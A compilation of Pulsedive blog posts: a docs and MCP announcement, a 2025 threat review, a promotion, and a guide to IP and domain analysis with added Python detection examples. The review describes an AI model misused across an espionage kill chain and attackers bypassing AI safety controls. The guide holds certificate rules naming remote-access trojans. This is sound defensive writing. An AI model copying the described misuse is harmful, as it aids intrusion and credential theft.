Pulsedive now has a dedicated documentation site: docs.pulsedive.com. Whether you're exploring Pulsedive for the first time or building against it at scale, the docs are your reference for what our API can do and how you can use it.
Why now?
Pulsedive’s docs started where a lot of companies’ docs start: built into the product, close to the team, good enough for the scale at the time. As the platform grew, so did the gap. More features meant more things to document, more places where the docs lagged behind the API, and more time you spent tracking down answers that should have been right in front of you.
Frictionless access to Pulsedive data and our products is one of our core principles. The old docs setup wasn’t living up to that. This site is the fix.
What's available now
This first release covers the complete API surface, with request parameters, response schemas, and curl examples throughout:
Indicators: Get full indicator context in a single request, including risk scores, properties, linked indicators, and metadata
Scan: Submit indicators for on-demand enrichment (passive or active) and poll for results
Threats: Query threat data including associated indicators, aliases, risk levels, and timeline information
Feeds: Download bulk indicator data, filtered by risk, type, and time period
Explore: Run structured queries across Pulsedive's indicator and threat database
STIX via TAXII: Pull indicator and threat data in STIX 2.1 format over TAXII 2.1, with full filter support
Global reference: Authentication, output formats, error codes, and pagination, all in one place
Built for how you actually work
Every endpoint includes full parameter tables right where you need them: descriptions, accepted values, defaults. So you’re not hunting across pages to understand a single call.
Response schemas show what you’ll actually get back, including the different shapes a response can take depending on what you asked for.
The docs also include a full API playground. Make live calls against the API, see real response shapes, and build your request in curl without leaving the page.
TAXII has its own dedicated playground too. Try the full TAXII surface the same way, with your API key.
Search, light and dark mode, and a clean information hierarchy round it out. Because documentation that is hard to navigate isn’t actually useful.
Use it with your AI tools
If you're already using an AI assistant to write and debug your integrations, it should be able to answer questions about the Pulsedive API directly, not guess based on whatever it last scraped from the internet.
Connect the MCP server at docs.pulsedive.com/mcp to Claude, Cursor, VS Code, or any MCP-compatible tool. Here’s how to get started in Claude:
Open Claude and go to Customize > Connectors.
Select +, then Add custom connector.
Enter a name for your connector (we used "Pulsedive Docs") and set the Remote MCP server URL to https://docs.pulsedive.com/mcp.
Select Add.
Your AI assistant can now query the Pulsedive docs directly. No web search, no stale results.
More on the way
This is the foundation, not the finish line. Integration guides, workflow examples, and content built for security teams putting Pulsedive data to work in their programs are on the way.
Teams are already using the API to enrich indicators at detection time, automate threat lookups that used to be manual, and pipe Pulsedive data into their own tooling. If you're building something in this space, we’d love to hear about it.
This blog aims to highlight some of the major incidents and events in cyberspace in 2025. This year saw the disclosure of vulnerabilities that were rapidly exploited, the continued success of ransomware operators, and law enforcement takedowns disrupting malware-as-a-service operations. Apart from the continued targeting of public-facing sources such as firewalls and other networking appliances, this year also saw several supply chain compromises, including the Shai-Hulud worm.
Read on for a review of:
Review of our predictions from 2024
State of vulnerability exploitation
Top malware
Law enforcement actions
Predictions for 2026
Pulsedive rewind
Recap
Looking Back at Our Predictions for 2025
Exploitation of Public-Facing Infrastructure
In 2024, we predicted that exploitation attempts against public-facing infrastructure would remain commonplace. Moreover, we expected to observe rapid adoption of exploit and proof-of-concept code by threat actors seeking to exploit these devices. This prediction held, as evidenced by vulnerabilities such as ToolShell, React2Shell, and CVE-2025-59287, where exploitation attempts skyrocketed after researchers released proof-of-concept code. The Key Exploited Vulnerabilities section below discusses notable vulnerabilities from 2025.
Continued RMM Abuse
We also predicted that threat actors would continue to abuse RMM tools during intrusions. These tools allow threat actors to gain access to an environment and establish secondary persistence mechanisms within it. Part of the appeal of using these tools is that threat actors don’t need to deploy additional tooling and can blend in by using applications already used within a victim’s environment.
Figure 1: Blackpoint Cyber identified incidents across 13 industries in which the threat actor used GoToResolve during the intrusion. Source: Blackpoint Cyber
Use of Gen AI in attacks
Last year, we predicted that threat actors would adopt Gen AI tooling to help create more effective social engineering lures and malicious tooling. While we had predicted that Gen AI tools would help threat actors, 2025 revealed that threat actors have integrated AI into malware and used prompt engineering to bypass AI safety controls. Notably, Anthropic reported on the first AI-orchestrated cyber espionage campaign.
Cyber Espionage Campaign Detected by Anthropic
Anthropic released a report on November 13, 2025, detailing what they claimed was an AI-enabled cyber espionage campaign. Anthropic attributed the intrusion to a Chinese state-sponsored group that targeted around 30 organizations with multiple successful intrusions. The threat actor leveraged AI throughout the kill chain to help achieve their objectives.
AI uses:
Autonomous Reconnaissance
Leveraged MCP servers to document infrastructure, authentication mechanisms, and identify vulnerabilities
Once access was obtained, Claude was used to map network services and IP ranges to identify services
Vulnerability Discovery
Claude used to generate payloads for vulnerabilities and analyze responses
Credential Collection
Extraction of authentication certificates
Lateral movement
Authentication to APIs, Database systems, and container registries
Data Collection
Collected information from authenticated services such as databases and sorted the collected data by value
Documentation
Detailed documentation was created that contains information about identified services and exfiltrated data
Anthropic outlined that the campaign predominantly leverages open-source red team tooling rather than custom malware.
💡 For more details about Anthropic’s findings, read their report.
Figure 2: Actions performed by Claude during the vulnerability scanning phase of the attack.
Recorded Future released the AI Malware Maturity Model, noting that most AI malware would fall into the experimenting, adopting, or optimizing categories instead of fully automated attacks. Current AI usage aligns with our prediction that AI is a tool to enable threat actors, not one that removes the human operator from the attack. Recorded Future also identified different types of AI malware.
Figure 3: Types of AI malware as determined by Recorded Future. Source: Recorded Future
Key Exploited Vulnerabilities
This section is not intended to be an exhaustive list of vulnerabilities exploited in 2025, but rather a selection of some memorable ones that most impacted security teams.
CISA’s Known Exploited Vulnerabilities (KEV) Catalog was used to collect statistics about exploited vulnerabilities in 2025. CISA has added 236 vulnerabilities to the catalog in 2025. The data used in the graphs below is accurate as of December 14th, 2025, at 12:17:58 EST.
Figure 4: Unique vulnerabilities added to CISA’s known exploited vulnerabilities catalog in 2025.
Of the 236 vulnerabilities added to KEV in 2025, 23 have been used in ransomware campaigns. These vulnerabilities include those in edge devices such as SMA100, NetScaler ADC, and Connect Secure. Other public-facing devices, such as Oracle E-Business Suite, SharePoint, and CrushFTP, were also targeted in ransomware campaigns.
Figure 5: Number of vulnerabilities added to CISA KEV in 2025 that have been used in ransomware campaigns.
ToolShell
ToolShell is a name given to two SharePoint vulnerabilities that allow a threat actor to bypass authentication (CVE-2025-49704) and remotely execute code by writing files to the server (CVE-2025-49706). CVE-2025-53770 and CVE-2025-53771 are CVEs assigned to subsequent vulnerabilities that bypassed patches for CVE-2025-49704 and CVE-2025-49706. Successful exploitation of these vulnerabilities led to files being dropped on the SharePoint servers.
Threat actors exploited these vulnerabilities to collect machine keys from SharePoint servers.
Figure 6: Web shell used to collect machine scripts from compromised SharePoint hosts. Source: Canadian Center for Cyber Security
Figure 7: Snippet of POST request used to exploit the vulnerability. Source: Kaspersky
React2Shell
React2Shell (CVE-2025-55182) is a critical unauthenticated remote code execution vulnerability in the React Server Components (RSC) Flight protocol. Threat actors have used this vulnerability to check for vulnerable components, conduct reconnaissance, and deploy additional payloads, including coinminers such as XMRig on vulnerable instances.
Figure 8: POST request where the threat actor attempts to initiate a ping request to an IP address. Source: eSentire
Mandiant has also reported on threat actors deploying XMRig to mine cryptocurrency. In one intrusion, the threat actor downloaded a shell script that, in turn, downloaded and executed XMRig from GitHub.
Malware
Information stealers continued to prove valuable for cybercrime actors. Due to their popularity, new malware-as-a-service offerings emerged in 2025. One such malware is Katz, which was first observed in April 2025. It advertised the ability to extract information from Chromium- and Gecko-based web browsers. Aura Stealer is another information stealer that was first observed in July 2025. Aura Stealer advertised support for Telegram integration via a bot and several configuration options.
Supply chain compromises were prominent throughout the year. We saw several NPM and Python package compromises as well as malware masquerading as legitimate applications.
EvilAI
The operators behind EvilAI disguise their malware as productivity tooling that uses AI to enhance user experience. These malicious applications claim to provide productivity functionality, such as merging PDFs, and are signed with valid digital signatures. These malicious applications were distributed through malicious advertisements, SEO manipulations, and social media links.
Figure 9: Example of a digital certificate used by EvilAI. Source: Trend Micro
Figure 10: EvilAI infection flow identified by Trend Micro. Source: Trend Micro
NPM Compromises
Several major NPM compromise campaigns impacted popular packages in 2025. Two of these campaigns were tied to the Shai-Hulud worm, which was used to exfiltrate sensitive information from GitHub repositories.
September 8th Campaign
The September 8th, 2025 campaign compromised packages including chalk and debug. Both of these packages are downloaded over 250 million times a week. The compromised packages were modified to include malicious code. The malicious code targets cryptocurrency wallets by intercepting connections to cryptocurrency platforms and replacing the destination wallet with a hardcoded one.
Figure 11: Hardcoded Cryptocurrency Wallets added by the threat actor.
Shai-Hulud
💡 Pulsedive threat research covered the technical details of the first and second Shai-Hulud campaigns this year.
The Shai-Hulud worm was used to exfiltrate secrets from GitHub repositories. In the first Shai-Hulud campaign, compromise activity was seen from September 15 at 03:46 to September 16 at 13:42 EST. The malware used TruffleHog to identify and collect credentials and secrets. The identified data was exfiltrated using GitHub actions to the webhook[.]site domain.
As part of the attack, GitHub workflows were used to convert private repositories to public ones. The repositories that were turned into public ones had the description “Shai-Hulud Migration”, and the term “-migration” was added to the name.
On November 24, 2025, multiple security vendors reported a new Shai-Hulud campaign that compromised several popular npm packages. The compromised packages include those from Zapier, ENS Domains, PostHog, and Postman. Researchers from Wiz identified that the earliest evidence of malicious npm packages being added to npm is from around 03:00 UTC on November 24th, 2025. The compromise results in a GitHub repository containing stolen information.
Law Enforcement Action and Disruption Operations
Operation Endgame
Figure 12: Operation Endgame banner added by Law Enforcement on seized domains. Source: Vectra
Law enforcement continued their disruption operations through Operation Endgame. In 2024, law enforcement disrupted the operations of malware-as-a-service offerings by targeting their distribution networks. The operation disrupted the following malware families:
IcedID
SystemBC
Pikabot
SmokeLoader
BumbleBee
Trickbot
This operation led to the arrest of individuals involved in cybercrime and the takedown of infrastructure. Disruptions through Operation Endgame continued in 2025.
Law enforcement followed up their actions in 2024 by arresting customers of the SmokeLoader botnet operated by SuperStar. The botnet was sold on a pay-per-install basis, allowing customers to gain access to victim machines.
In November 2025, law enforcement agencies took down more than 1025 servers and seized 20 domains associated with Rhadamanthys, VenomRAT, and Elysium. By taking down servers, law enforcement disrupted the infrastructure used to host, control, and disseminate malware. The action also led to the arrest of an individual in Greece.
Disrupting Lumma
Microsoft seized and helped take down 2,300 domains associated with Lumma. In conjunction with Microsoft's actions, the U.S. Department of Justice also took control of the Lumma command infrastructure. Similarly, Europol’s European Cybercrime Centre and Japan’s Cybercrime Control Center suspended local Lumma infrastructure.
Figure 13: Seizure notice displayed on Lumma domains. Source: Microsoft
Looking Ahead
In 2025, threat actors continued to operate similarly to how they operated in 2024. We expect this to continue in 2026. Identity-based threats, such as stolen credentials or Adversary-in-the-Middle threats like phishing kits, will continue to play a significant role in intrusions. CrowdStrike notes that valid account abuse was the primary initial access method in 35% of cloud intrusions, while access-broker advertisements on forums increased by 50% compared to previous years.
The use of Generative AI will continue to increase in 2026, and we expect threat actors to embed AI in their operations. Furthermore, we expect AI malware to continue to mature, and we will see more automated intrusions that leverage AI in the future.
Pulsedive Rewind
GitHub Page
Towards the end of 2025, we created our GitHub page. The resources repository on our GitHub holds additional artifacts from the analysis we conducted for our blogs. These artifacts include samples, scripts, examples of exfiltrated data, and PCAPs.
For Black Friday and Cyber Monday this year, our Annual Promotion Turkey (aka APT) is back with a deal for Pulsedive Pro.
The Highlights
30% Off 12 Months of Pro with BLACKFRIDAY25
🏷️ Get 30% off up to 12 months of a Pulsedive Pro plan by using code "BLACKFRIDAY25" during checkout before midnight on December 1, 2025.
For more information, read on:
What's Pulsedive Pro?
What's the Deal?
FAQs
More Black Friday Deals
What is Pulsedive Pro?
Pro is an affordable upgrade of the Pulsedive Community experience, developed for security analysts, engineers, researchers, and enthusiasts. Pro offers more of the data that Pulsedive users love, all in the same intuitive interface.
Features include:
Third party enrichment integrations: VirusTotal, Shodan, AbuseIPDB
How to Redeem: After hitting "checkout" from Pulsedive's purchase page, enter "BLACKFRIDAY25" in the promotion code field. Complete payment information and subscribe. You'll need to first have an existing Pulsedive account, which you can create here: https://pulsedive.com/register
When you cancel, your subscription will end immediately and you will not be billed in the future. You can re-subscribe or upgrade Pulsedive plans under your account page, but the discount will no longer apply.
I don't have an account. To purchase any Pulsedive plan, you must have an account. Register a free account here: https://pulsedive.com/register
I want a custom plan (e.g. multiple Pro seats, multi-year subscription, or multiple products). Contact sales@pulsedive.com. We offer discounts on bundles of Pro seats for organizations looking to grab multiple licenses in one go.
🦃 Happy Black Friday Deal Hunting!
For other infosec deals, we're tracking and adding Black Friday 2025 lists here:
Calling all Pulsedive users and community members: we want your input.
Whether you read every new Pulsedive Threat Research blog post or have only come across one, your feedback will help us create and share the content that matters most to you. Take our quick 5 minute survey to share what topics, research, and formats you’d like to see more of. Your insights will inform future research-focused articles and analysis.
Take our 5 minute survey: https://forms.gle/QhduoWXSd8s4GRtH6
In the field of cyber threat intelligence (CTI), IP addresses and domain names are commonly shared indicators of compromise. They are commonly used solely to create blocklists on tools such as firewalls and other networking devices. Blocking these atomic indicators of compromise is a viable solution when consuming threat intelligence feeds, but they can also be used to enrich alerts, provide context, and expand detection logic. This blog outlines how IP addresses and domains can provide additional value within the disciplines of threat intelligence, detection engineering, and threat hunting. Moreover, this blog will share details and guidance on how to conduct IP and domain analysis to draw conclusions, as well as showcase examples of data processing from Pulsedive and popular analyst tools.
The Pyramid of Pain
Any discussion about value within threat intelligence will likely touch upon the Pyramid of Pain. The Pyramid of Pain, coined by David Bianco, is a model used in CTI to illustrate the difficulty experienced by adversaries and threat actors when defenders detect and respond to different types of indicators during an attack. Moving up the pyramid from hash values to TTPs correlates with increased "pain" for the adversary, since each tier becomes more challenging to replace or adapt. IP addresses and domain names make up two of the lower tiers in the pyramid and may not cause as much pain to threat actors as detecting tools or TTPs. This is because IP addresses and domains can be ephemeral. Threat actors can quickly rotate through IP addresses during campaigns, negating the impact of blocking individual addresses. Similarly, domain names can be registered in bulk; with various registrars, it is easy for a threat actor to spin up network infrastructure fairly quickly.
Figure 1: The Pyramid of Pain
Since these indicator types are ephemeral, even adding these indicators to blocklists may provide limited value. Blocking provides value when a threat actor consistently uses the same IP address or domain name across a campaign. Once they rotate to a new IP address or domain, the blocked indicators cease to provide value outside of retroactive investigations. In the short term, blocking IP addresses and domain names can yield timely results and identify malicious or suspicious activity. However, these lists need to be actively maintained and regularly purged to remove indicators that are no longer active or have been removed by vendors.
💡 How long until an IOC should be or is retired will depend on several factors, including:
- The confidence level associated with that IOC
- When was the indicator last seen?
- Is this indicator associated with other threats?
- Storage limitations on tools (blocklists have a finite size)
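The retirement factors in the callout above can be turned into a concrete aging policy. The following Python is an added example, not Pulsedive code: the Indicator fields, the confidence bands and day limits, the grace period for indicators tied to several threats, the blocklist capacity, and the sample indicators are all assumptions constructed for illustration.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Constructed illustration of the retirement factors listed in the callout.
# The thresholds, the Indicator fields and the blocklist capacity are
# assumptions for this example, not Pulsedive's policy or data model.

@dataclass
class Indicator:
    value: str
    ioc_type: str            # "ip" or "domain"
    confidence: int          # 0-100, as assigned by the source or analyst
    last_seen: datetime      # last time the indicator was observed active
    threats: list = field(default_factory=list)  # associated threat names
    retired_by_vendor: bool = False                # vendor withdrew the IOC

# Assumed maximum age (days) before an IOC is retired, scaled by confidence.
MAX_AGE_DAYS = {"high": 90, "medium": 45, "low": 14}

def confidence_band(conf: int) -> str:
    if conf >= 75:
        return "high"
    if conf >= 40:
        return "medium"
    return "low"

def should_retire(ioc: Indicator, now: datetime) -> tuple:
    """Return (retire?, reason) for a single indicator."""
    if ioc.retired_by_vendor:
        return True, "withdrawn by vendor"
    age = (now - ioc.last_seen).days
    limit = MAX_AGE_DAYS[confidence_band(ioc.confidence)]
    # An indicator tied to more than one threat earns a grace period, since it
    # keeps paying off across campaigns (assumed: +50% of the base limit).
    if len(ioc.threats) > 1:
        limit = int(limit * 1.5)
    if age > limit:
        return True, f"stale: last seen {age}d ago, limit {limit}d"
    return False, "active"

def prune_blocklist(iocs, now, capacity):
    """Drop retired IOCs, then trim to the device's capacity, keeping the
    most valuable entries (confidence, then recency, then threat count)."""
    keep = [i for i in iocs if not should_retire(i, now)[0]]
    keep.sort(key=lambda i: (i.confidence, i.last_seen, len(i.threats)), reverse=True)
    return keep[:capacity]

NOW = datetime(2025, 6, 1, tzinfo=timezone.utc)
SAMPLE = [  # constructed values, not real intelligence
    Indicator("203.0.113.10", "ip", 90, NOW - timedelta(days=10), ["ThreatA"]),
    Indicator("198.51.100.7", "ip", 30, NOW - timedelta(days=20), ["ThreatB"]),
    Indicator("bad.example", "domain", 60, NOW - timedelta(days=60), ["ThreatA", "ThreatC"]),
    Indicator("old.example", "domain", 95, NOW - timedelta(days=5), [], retired_by_vendor=True),
    Indicator("scanner.example", "domain", 80, NOW - timedelta(days=100), ["ThreatD"]),
]

if __name__ == "__main__":
    for ioc in SAMPLE:
        print(ioc.value, should_retire(ioc, NOW))
    print([i.value for i in prune_blocklist(SAMPLE, NOW, capacity=2)])
```

The medium-confidence domain survives despite being 60 days old because its second threat association extends the limit to 67 days, while the high-confidence scanner address is retired at 100 days; the capacity trim then keeps the two highest-ranked survivors.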
Uses of IPs and Domains
Providing Context During Investigations
Security analysts often spend time either manually enriching data to gain additional information about events or leveraging automated lookups to provide this context. Enriching IP addresses can include leveraging IP geolocation data, reputation data, and provider data. Geolocation data can give an approximation of the user’s location when a specific activity is performed and can be used to identify compromised accounts when multiple login sessions or actions are performed by the same user from physical locations that could not plausibly be reached in the time between them. Reputation data is another valuable enrichment during investigations, as it sheds light on the IP addresses and the other activities associated with them. Common reputation clues include whether the address has been reported by other users for exploitation or scanning activity, or whether it belongs to a VPN provider.
Examples of how Pulsedive users leverage this enrichment data:
Manual Approach: An analyst visits Pulsedive, performs a scan, and collects the relevant information to help during an investigation.
Hybrid/Automated Approach: A SIEM/SOAR solution integrates with Pulsedive and is configured to retrieve data about IP addresses and domains. An alert may be triggered based on suspicious activity, where an analyst then uses this data to investigate an alert and make a determination about this activity.
Figure 2: A sample workflow of a Pulsedive client using enriched data during an investigation.
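The geolocation-based compromised-account check described above, as an added Python example rather than Pulsedive's own code or a real integration. The GEO lookup stands in for an enrichment service response, the login log format is assumed, and the 900 km/h ceiling and the IP/coordinate pairs are constructed values.

```python
import math
from datetime import datetime

# Constructed lookup standing in for a geolocation enrichment response
# (for example a SIEM calling an IP enrichment API). Coordinates are
# approximate city centres; the IPs are documentation ranges, not real data.
GEO = {
    "203.0.113.5":  {"city": "New York",  "lat": 40.71, "lon": -74.01},
    "198.51.100.9": {"city": "Singapore", "lat": 1.35,  "lon": 103.82},
    "192.0.2.77":   {"city": "Boston",    "lat": 42.36, "lon": -71.06},
}

MAX_SPEED_KMH = 900.0  # assumed ceiling, roughly commercial flight speed

def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) pairs."""
    r = 6371.0
    la1, lo1, la2, lo2 = map(math.radians, (a[0], a[1], b[0], b[1]))
    h = (math.sin((la2 - la1) / 2) ** 2
         + math.cos(la1) * math.cos(la2) * math.sin((lo2 - lo1) / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(h))

def parse_login(line):
    """Parse one constructed login line: '<iso ts> user=<u> src=<ip> result=<r>'."""
    ts, *kv = line.split()
    fields = dict(p.split("=", 1) for p in kv)
    fields["ts"] = datetime.fromisoformat(ts)
    return fields

def find_impossible_travel(lines, geo=GEO, max_speed_kmh=MAX_SPEED_KMH):
    """Return (user, ip_before, ip_after, speed_kmh) for consecutive successful
    logins by the same user whose implied travel speed exceeds the ceiling."""
    by_user = {}
    for ev in sorted(map(parse_login, lines), key=lambda e: e["ts"]):
        # Only successful logins from enrichable addresses count as a position.
        if ev["result"] != "success" or ev["src"] not in geo:
            continue
        by_user.setdefault(ev["user"], []).append(ev)
    alerts = []
    for user, events in by_user.items():
        for prev, cur in zip(events, events[1:]):
            if prev["src"] == cur["src"]:
                continue
            g1, g2 = geo[prev["src"]], geo[cur["src"]]
            km = haversine_km((g1["lat"], g1["lon"]), (g2["lat"], g2["lon"]))
            hours = (cur["ts"] - prev["ts"]).total_seconds() / 3600
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_speed_kmh:
                alerts.append((user, prev["src"], cur["src"], round(speed)))
    return alerts

SAMPLE_LOGINS = [  # constructed log lines
    "2025-03-01T08:00:00+00:00 user=alice src=203.0.113.5 result=success",
    "2025-03-01T08:45:00+00:00 user=alice src=198.51.100.9 result=success",
    "2025-03-01T09:00:00+00:00 user=bob src=203.0.113.5 result=success",
    "2025-03-01T13:00:00+00:00 user=bob src=192.0.2.77 result=success",
    "2025-03-01T13:05:00+00:00 user=carol src=198.51.100.9 result=failure",
    "2025-03-01T13:06:00+00:00 user=carol src=203.0.113.5 result=success",
]

if __name__ == "__main__":
    for alert in find_impossible_travel(SAMPLE_LOGINS):
        print("impossible travel:", alert)
```

Only alice trips the check (New York to Singapore in 45 minutes); bob's New York to Boston hop over four hours is well under the ceiling, and carol's failed login is ignored so a single success produces no pair to compare. In practice the VPN/proxy reputation enrichment mentioned later in this post is what explains most false positives here.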
Atomic indicators can also be used to hunt for malicious activity in an environment. Simpler to conduct than behavioral threat hunting, indicator-based hunting focuses on the presence of known malicious indicators of compromise (IOCs) to identify malicious activity in historical network logs. Security tools can be used to search an environment for IOCs that security researchers have shared. Hits on these IOCs may lead to the discovery of previously undetected intrusions.
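Indicator-based hunting over historical logs, as an added Python example that is not part of the original post. It refangs a constructed list of shared IOCs (documentation ranges and reserved names, not real indicators), reduces URL IOCs to their host, and matches them against constructed key=value proxy log lines; the log format is an assumption.

```python
import re

# Constructed feed of shared IOCs in defanged form, as a vendor report would
# publish them. Values use documentation ranges and reserved names only.
SHARED_IOCS = [
    "203[.]0[.]113[.]45",
    "hxxp://malicious[.]example/panel",
    "c2[.]bad[.]example",
    "198[.]51[.]100[.]23",
]

def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    s = ioc.strip().lower()
    s = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("hxxp", "http"), s)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")

def extract_host(ioc: str) -> str:
    """Reduce a URL IOC to its host so it matches host-only log fields."""
    s = re.sub(r"^https?://", "", refang(ioc))
    return s.split("/", 1)[0].split(":", 1)[0]

def build_index(iocs):
    """Map normalized host/IP -> original defanged IOC, for reporting."""
    return {extract_host(i): i for i in iocs}

# Constructed proxy log lines in a simple key=value form (assumed format).
SAMPLE_LOGS = [
    "2025-02-10T10:01:02Z src=10.0.0.5 dst=203.0.113.45 dport=443 host=-",
    "2025-02-10T10:01:09Z src=10.0.0.8 dst=192.0.2.10 dport=80 host=cdn.example",
    "2025-02-10T10:02:30Z src=10.0.0.5 dst=192.0.2.11 dport=443 host=MALICIOUS.example",
    "2025-02-10T10:03:00Z src=10.0.0.9 dst=198.51.100.200 dport=22 host=-",
    "2025-02-10T10:04:11Z src=10.0.0.12 dst=192.0.2.12 dport=443 host=c2.bad.example",
]

def hunt(log_lines, iocs=SHARED_IOCS):
    """Return (timestamp, src, matched_ioc) for each log line touching an IOC.
    Exact lookups on dst and host avoid substring false positives such as
    198.51.100.23 matching 198.51.100.200."""
    index = build_index(iocs)
    hits = []
    for line in log_lines:
        ts, *kv = line.split()
        f = dict(p.split("=", 1) for p in kv)
        for candidate in (f.get("dst", ""), f.get("host", "").lower()):
            if candidate in index:
                hits.append((ts, f["src"], index[candidate]))
                break
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(hit)
```

Reporting the original defanged string alongside each hit keeps the result traceable back to the source report, which matters when the hit turns into a retroactive investigation.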
Research
Indicators can be tied together to identify particular malware families and reveal commonalities that make it easier to identify other artifacts associated with that threat. For example, Pulsedive threat research used IP addresses, domains, and content served on web pages to track and identify additional Mystic Stealer control panels back in July 2023.
When we encountered research from other vendors regarding Mystic Stealer, we utilized the IOCs to identify commonalities between them before attempting to identify additional domains to track. Our approach involved looking at the following items for each identified IOC:
Figure 3: Pivot points used during our investigation.
Based on information shared by security researchers, we observed that the HTML title for the control panel was "Mystic Stealer - Login". We used this information to pivot to tools such as FOFA, Shodan, and Binary Edge to identify additional IP addresses and domains associated with Mystic Stealer Control Panels.
Figure 4: HTML content reveals that the console page has an HTML title of "Mystic Stealer - Login".
Figure 5: Mystic Stealer Control Panels identified on Shodan during our investigation in 2023
IP Analysis Tools
💡 The Curated Intel team shared a GitHub repository that contained tools to collect information about an IP address.
Depending on the use case and the information we want to obtain, many tools can provide information about IP addresses. This information can include:
IP Reputation
IP Geolocation
Is it a Cloud/CDN IP?
Is it a VPN, Tor node, or proxy?
IP WHOIS
ASN
Open Ports & Services Running
Figure 6: Information that can be obtained from an IP address.
During investigations, some of the first items analysts commonly check for are the reputation and geolocation of an IP address. IP reputation can show if an IP address has been observed by others performing scans or attempting to exploit vulnerabilities.
Figure 7: IP addresses associated with CVE-2024-8963 exploitation attempts within GreyNoise.
Figure 8: ASN information provided by ipinfo for an IP address seen in Figure 7.
Figure 9: An IP address previously associated with Mystic Stealer.
Tools such as Spur or IP Quality Score can be used to detect VPN or Proxy usage. This information is valuable during investigations, as it can explain differences in geolocation and be used to track activity against specific devices or sessions. Moreover, the use of specific VPN providers or proxies can be used to cluster activity to different threat groups. For example, security researchers have identified that Famous Chollima frequently uses Astrill VPN during intrusions.
Figure 10: IP address from SilentPush that was observed being used by Famous Chollima
Figure 11: Mind map of how ASN data can be utilized in Threat Hunting and security investigations. Source: Huntress
Other Analysis Tools
Data collected about domains can also be used to cluster activity back to a particular threat or actor. In some cases, this will be as simple as examining X.509 certificates to identify common names. In contrast, in other cases, it will require a wealth of data from both the domain and the IP addresses to recognize patterns.
Some of the information that can be collected about domains includes:
WHOIS/RDAP Information
Date registered
Registrar Information
Content hosted
Certificate Details
Favicons
Meta Tags
Figure 12: Pivot points associated with domains.
X.509 certificate data contains a wealth of information that can be used to identify additional IOCs.
Figure 13: Some key items that make up an X.509 certificate. Complete details are available in RFC5280.
Figure 14: List of distinguished names available for subject and issuer names. Source: Cryptosys.
Taking an entry for DCRat from the SSL Blacklist provides us with a SHA1 fingerprint, Subject Name, and Issuer Name. Any of these can be used to search tools like Censys to identify additional IP addresses using the same certificate.
Figure 15: SSL Blacklist entry for a certificate used by DCRat.
Figure 16: Censys results showing 46 IPs that use an SSL certificate where the subject common name contains 'DCRat'.
Searching Censys for the value DCRat in the subject common name yields 46 results. Drilling into the IP 203[.]104[.]42[.]92, the certificate details reveal that the subject common name is the same, but the issuer distinguished name is different.
Figure 17: X.509 certificate details for the IP 203[.]104[.]42[.]92
Unique values within certificate data can also be incorporated into detections. A blog by Corelight contains network signatures that focus on the content of the TLS certificate.
Figure 18: Corelight detections for AsyncRAT and other variants.
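Certificate-content detection of the kind referenced above, as an added Python example (not Corelight's signatures and not Pulsedive code). It runs constructed rules keyed on the subject CN, the issuer CN, and a SHA1 fingerprint over a simplified, constructed TSV resembling a subset of Zeek's x509.log; the column layout, rule names, distinguished-name values, and fingerprint strings are all assumptions.

```python
import re
from dataclasses import dataclass

# Simplified, constructed TSV resembling a subset of Zeek's x509.log columns
# (assumed: ts, fingerprint, subject, issuer). Fingerprints are made-up hex
# strings, not hashes of any real certificate from any blocklist.
SAMPLE_X509_LOG = """\
1738400000.1\t1111111111111111111111111111111111111111\tCN=DCRat Server\tCN=DCRat
1738400001.2\t2222222222222222222222222222222222222222\tCN=www.example,O=Example Co\tCN=Example Root CA,O=Example Co
1738400002.3\t3333333333333333333333333333333333333333\tCN=updates.example\tCN=AsyncRAT Server
1738400003.4\t4444444444444444444444444444444444444444\tCN=Payload Host\tCN=Some CA
"""

@dataclass
class CertRule:
    name: str
    field: str      # "subject", "issuer" or "fingerprint"
    pattern: str    # regex for subject/issuer, exact hex for fingerprint

# Constructed rules in the spirit of certificate-content signatures: a subject
# CN pattern, an issuer CN pattern, and a fingerprint taken from a blocklist
# entry (the three pivots the SSL Blacklist entry above provides).
RULES = [
    CertRule("dcrat_subject_cn", "subject", r"CN=[^,]*DCRat"),
    CertRule("asyncrat_issuer_cn", "issuer", r"CN=AsyncRAT"),
    CertRule("blocklisted_fingerprint", "fingerprint",
             "4444444444444444444444444444444444444444"),
]

def parse_dn(dn: str) -> dict:
    """Split 'CN=x,O=y' into {'CN': 'x', 'O': 'y'} for attribute-level checks."""
    return dict(part.split("=", 1) for part in dn.split(",") if "=" in part)

def parse_x509_log(text: str):
    """Parse the assumed four-column TSV into row dicts."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, fp, subject, issuer = line.split("\t")
        rows.append({"ts": ts, "fingerprint": fp.lower(),
                     "subject": subject, "issuer": issuer,
                     "subject_cn": parse_dn(subject).get("CN", ""),
                     "issuer_cn": parse_dn(issuer).get("CN", "")})
    return rows

def match_rules(rows, rules=RULES):
    """Return (ts, rule_name, subject_cn) for each row that hits a rule."""
    hits = []
    for row in rows:
        for rule in rules:
            value = row[rule.field]
            if rule.field == "fingerprint":
                matched = value == rule.pattern.lower()
            else:
                matched = re.search(rule.pattern, value) is not None
            if matched:
                hits.append((row["ts"], rule.name, row["subject_cn"]))
    return hits

def detect(text: str = SAMPLE_X509_LOG):
    return match_rules(parse_x509_log(text))

if __name__ == "__main__":
    for hit in detect():
        print(hit)
```

Fingerprint rules are the most precise but break as soon as the operator regenerates a certificate; subject and issuer patterns survive that rotation, which is why the Censys pivot above on the subject common name found more hosts than a single hash would.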
Conclusion
The ephemeral nature of IP addresses and domains means that they may not seem as valuable within threat intelligence and detection engineering as other artifacts. This is true to a certain extent, but analyzing IP addresses and domains can help researchers and analysts uncover additional detections useful in identifying additional IOCs or malicious activity.
Analysis of IP addresses and domain names can reveal patterns or unique identifiers, such as particular proxies being used to initiate connections. X.509 certificates contain specific values that allow security teams to detect additional suspicious or malicious data. Moreover, analysis can help cluster activity based on commonalities between artifacts to identify a particular threat or actor. The speed of sharing, ease of automation, and availability make these IOCs a component of a holistic threat intelligence program. When contextualized alongside other indicators higher up in the pyramid of pain, teams can gain valuable insights into threat actor behavior, which may lead to additional detection opportunities.
